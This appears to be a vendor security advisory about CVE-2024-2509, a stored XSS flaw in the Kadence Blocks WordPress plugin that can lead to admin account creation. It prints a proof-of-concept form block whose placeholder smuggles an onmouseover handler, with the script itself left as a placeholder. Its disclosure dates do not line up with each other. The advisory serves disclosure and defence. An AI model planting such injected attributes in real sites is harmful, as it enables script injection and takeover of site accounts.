A critical vulnerability, CVE-2024-2509, has been uncovered in the popular Gutenberg Blocks by Kadence Blocks plugin, boasting over 400,000 active installations. This flaw opens the door to malicious attackers, allowing them to execute Stored XSS attacks and potentially create admin accounts, posing a significant threat to WordPress sites.

Main info:

PluginGutenberg Blocks by Kadence Blocks < 3.2.26
CriticalVery High
All Time17 018 808
Active installations400 000+
Publicly PublishedMarch 15, 2023
Last UpdatedMarch 15, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A7: Cross-Site Scripting (XSS)
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2509
Plugin Security Certification by CleanTalk


March 6, 2023Plugin testing and vulnerability detection in the Gutenberg Blocks by Kadence Blocks have been completed
March 6, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
March 15, 2024Registered CVE-2024-2509

Discovery of the Vulnerability

During routine testing, security researchers identified a flaw within the Gutenberg Blocks by Kadence Blocks plugin that enables contributors to inject malicious code via stored XSS, ultimately leading to the unauthorized creation of admin accounts.

Understanding of Stored XSS attack’s

Stored XSS vulnerabilities involve injecting malicious scripts into a web application, which are then stored and executed whenever the compromised page is accessed. In WordPress, this can occur through various entry points, such as form inputs, widgets, or post content.

Exploiting the Stored XSS Vulnerability

Exploiting CVE-2024-2509 involves crafting a post containing malicious content using the Gutenberg Blocks by Kadence Blocks plugin. By inserting carefully crafted code snippets, attackers can execute arbitrary scripts within the context of the site, potentially gaining administrative privileges.


<!-- wp:kadence/advanced-form -->\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"538_353543-f6\",\"colLayout\":\"equal\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"538_9c17ee-78\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column538_9c17ee-78\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/advanced-form-text {\"uniqueID\":\"9c5eb1-eb\",\"formID\":\"539\",\"label\":\"Name\",\"placeholder\":\"123\\u0022onmouseover='MALICIOUS_FUNCTION_HERE'\"} /--></div></div>\n<!-- /wp:kadence/column -->\n\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"538_b30f2d-7e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column538_b30f2d-7e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/advanced-form-email {\"uniqueID\":\"24e500-60\",\"formID\":\"539\",\"label\":\"Email\",\"required\":true} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<!-- wp:kadence/advanced-form-textarea {\"uniqueID\":\"3579ce-60\",\"formID\":\"539\",\"label\":\"Message\",\"required\":true} /-->\n\n<!-- wp:kadence/advanced-form-submit {\"uniqueID\":\"44ddad-75\",\"text\":\"Submit\"} /-->\n<!-- /wp:kadence/advanced-form -->


The presence of a Stored XSS vulnerability in a widely used plugin like Gutenberg Blocks poses significant risks. Attackers can leverage this vulnerability to execute various malicious activities, including spreading malware, defacing websites, or stealing sensitive data.

Recommendations for Improved Security

To mitigate the risk associated with CVE-2024-2509, users should promptly update the Gutenberg Blocks by Kadence Blocks plugin to the latest version, where the vulnerability has been patched. Additionally, website administrators should regularly monitor for security updates and conduct thorough security audits to identify and address any potential vulnerabilities in their WordPress ecosystem.

By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-2509, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website


Create your CleanTalk account

By signing up, you agree with license. Have an account? Log in.
CVE-2024-2509 – Gutenberg Blocks by Kadence Blocks – Stored XSS to Admin Account Creation (Contributor+) – POC

Leave a Reply

Your email address will not be published. Required fields are marked *